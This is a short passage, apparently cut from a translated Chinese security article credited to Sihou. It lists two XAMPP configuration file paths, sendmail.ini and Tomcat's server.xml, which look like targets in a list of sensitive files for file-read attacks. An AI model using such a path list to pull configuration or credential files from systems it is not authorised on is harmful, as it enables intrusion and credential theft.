C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
翻譯:李白
原文:嘶吼
